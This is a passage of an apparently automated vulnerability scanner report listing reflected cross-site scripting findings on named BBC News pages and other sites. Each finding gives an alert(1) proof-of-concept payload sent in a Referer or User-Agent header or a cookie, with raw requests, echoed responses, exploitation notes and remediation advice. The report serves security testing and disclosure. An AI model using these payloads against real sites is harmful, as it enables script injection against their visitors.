The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 561e0<script>alert(1)</script>e04c3e53364 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: lookupserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)561e0<script>alert(1)</script>e04c3e53364
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Content-Length: 5703
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title
...[SNIP]...
<b>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)561e0<script>alert(1)</script>e04c3e53364</b>
...[SNIP]...

3.168. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7975'-alert(1)-'27a0b2dd17b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/from_our_own_correspondent/9538059.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d7975'-alert(1)-'27a0b2dd17b

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:58 GMT
Keep-Alive: timeout=5, max=798
Expires: Mon, 18 Jul 2011 02:19:58 GMT
Connection: close
Content-Length: 66316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955598000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d7975'-alert(1)-'27a0b2dd17b',
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType: null,
       uri: '/2/hi/
...[SNIP]...

3.169. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 226c8'-alert(1)-'2bd0c895a29 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=226c8'-alert(1)-'2bd0c895a29

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:58 GMT
Keep-Alive: timeout=5, max=785
Expires: Mon, 18 Jul 2011 02:20:58 GMT
Connection: close
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955658000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=226c8'-alert(1)-'2bd0c895a29',
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType: null,
       uri: '/2/hi/
...[SNIP]...

3.170. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cycling/14179023.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca67'-alert(1)-'0cda5dc6319 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/cycling/14179023.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dca67'-alert(1)-'0cda5dc6319

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:39 GMT
Keep-Alive: timeout=5, max=751
Expires: Mon, 18 Jul 2011 02:20:39 GMT
Connection: close
Content-Length: 57306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955639000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=dca67'-alert(1)-'0cda5dc6319',
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       uri: '/sport2/hi/cycli
...[SNIP]...

3.171. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/14168601.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49552'-alert(1)-'09ddbd65199 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/football/14168601.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=49552'-alert(1)-'09ddbd65199

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:42 GMT
Keep-Alive: timeout=5, max=775
Expires: Mon, 18 Jul 2011 02:20:42 GMT
Connection: close
Content-Length: 52099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955642000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=49552'-alert(1)-'09ddbd65199',
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       uri: '/sport2/hi/footba
...[SNIP]...

3.172. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/golf/14178214.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ff3c'-alert(1)-'3ebf363b53f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/golf/14178214.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2ff3c'-alert(1)-'3ebf363b53f

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:36 GMT
Keep-Alive: timeout=5, max=753
Expires: Mon, 18 Jul 2011 02:20:36 GMT
Connection: close
Content-Length: 56473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955636000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=2ff3c'-alert(1)-'3ebf363b53f',
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/sport2/hi/golf/141782
...[SNIP]...

3.173. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/motogp/14177052.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8569a'-alert(1)-'1ba42694830 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/motogp/14177052.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8569a'-alert(1)-'1ba42694830

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:43 GMT
Keep-Alive: timeout=5, max=794
Expires: Mon, 18 Jul 2011 02:20:43 GMT
Connection: close
Content-Length: 53432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955643000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=8569a'-alert(1)-'1ba42694830',
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
       uri: '/sport2/hi/mot
...[SNIP]...

3.174. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe938'-alert(1)-'03d0b63c54f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fe938'-alert(1)-'03d0b63c54f

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:40 GMT
Keep-Alive: timeout=5, max=776
Expires: Mon, 18 Jul 2011 02:20:40 GMT
Connection: close
Content-Length: 49436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955640000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fe938'-alert(1)-'03d0b63c54f',
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'story',
       uri: '/sport2/
...[SNIP]...

3.175. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cycling/14179023.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a28c'-alert(1)-'1816b6df525 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cycling/14179023.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3a28c'-alert(1)-'1816b6df525

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:21:06 GMT
Keep-Alive: timeout=5, max=797
Expires: Mon, 18 Jul 2011 02:21:06 GMT
Connection: close
Content-Length: 57306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955666000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=3a28c'-alert(1)-'1816b6df525',
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       uri: '/sport2/hi/cycli
...[SNIP]...

3.176. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/14168601.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa85e'-alert(1)-'33ab69fc437 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/14168601.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fa85e'-alert(1)-'33ab69fc437

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:36 GMT
Keep-Alive: timeout=5, max=773
Expires: Mon, 18 Jul 2011 02:20:36 GMT
Connection: close
Content-Length: 52023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955636000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fa85e'-alert(1)-'33ab69fc437',
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       uri: '/sport2/hi/footba
...[SNIP]...

3.177. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/golf/14178214.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a432b'-alert(1)-'9bd28bad69c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/golf/14178214.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a432b'-alert(1)-'9bd28bad69c

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:44 GMT
Keep-Alive: timeout=5, max=711
Expires: Mon, 18 Jul 2011 02:20:44 GMT
Connection: close
Content-Length: 55850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955644000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=a432b'-alert(1)-'9bd28bad69c',
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/sport2/hi/golf/141782
...[SNIP]...

3.178. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/motogp/14177052.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4d7e'-alert(1)-'ec64a95f7e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/motogp/14177052.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d4d7e'-alert(1)-'ec64a95f7e7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:45 GMT
Keep-Alive: timeout=5, max=794
Expires: Mon, 18 Jul 2011 02:20:45 GMT
Connection: close
Content-Length: 53432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955645000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d4d7e'-alert(1)-'ec64a95f7e7',
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
       uri: '/sport2/hi/mot
...[SNIP]...

3.179. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f455'-alert(1)-'f2321d0a6c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/rugby_union/welsh/14175299.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4f455'-alert(1)-'f2321d0a6c

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:55 GMT
Keep-Alive: timeout=5, max=794
Expires: Mon, 18 Jul 2011 02:20:55 GMT
Connection: close
Content-Length: 49358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955655000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=4f455'-alert(1)-'f2321d0a6c',
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'story',
       uri: '/sport2/
...[SNIP]...

3.180. http://s49.sitemeter.com/js/counter.js [IP cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s49.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aea69"%3balert(1)//e28fc1d79f2 was submitted in the IP cookie. This input was echoed as aea69";alert(1)//e28fc1d79f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s49redmondpie HTTP/1.1
Host: s49.sitemeter.com
